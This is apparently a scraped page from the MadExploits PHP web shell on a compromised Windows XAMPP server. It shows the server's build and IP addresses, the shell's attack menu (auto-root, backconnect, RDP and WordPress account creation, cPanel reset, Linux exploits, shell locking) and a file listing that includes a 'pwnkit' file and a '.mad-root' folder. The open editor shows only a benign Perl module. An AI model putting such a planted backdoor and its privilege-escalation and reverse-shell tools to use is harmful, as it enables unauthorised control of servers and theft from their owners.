Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.39
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
perl /
lib /
Filter /
[ HOME SHELL ]
Name
Size
Permission
Action
Util
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Simple.pm
23.36
KB
-rw-rw-rw-
cpp.pm
2.13
KB
-rw-rw-rw-
decrypt.pm
2.93
KB
-rw-rw-rw-
exec.pm
1.23
KB
-rw-rw-rw-
m4.pm
2.75
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
sh.pm
1.36
KB
-rw-rw-rw-
tee.pm
793
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tee.pm
package Filter::tee ; require 5.006 ; require XSLoader; our $VERSION = "1.60" ; XSLoader::load('Filter::tee'); 1; __END__ =head1 NAME Filter::tee - tee source filter =head1 SYNOPSIS use Filter::tee 'filename' ; use Filter::tee '>filename' ; use Filter::tee '>>filename' ; =head1 DESCRIPTION This filter copies all text from the line after the C<use> in the current source file to the file specified by the parameter C<filename>. By default and when the filename is prefixed with a '>' the output file will be emptied first if it already exists. If the output filename is prefixed with '>>' it will be opened for appending. This filter is useful as a debugging aid when developing other source filters. =head1 AUTHOR Paul Marquess =head1 DATE 20th June 1995. =cut
Close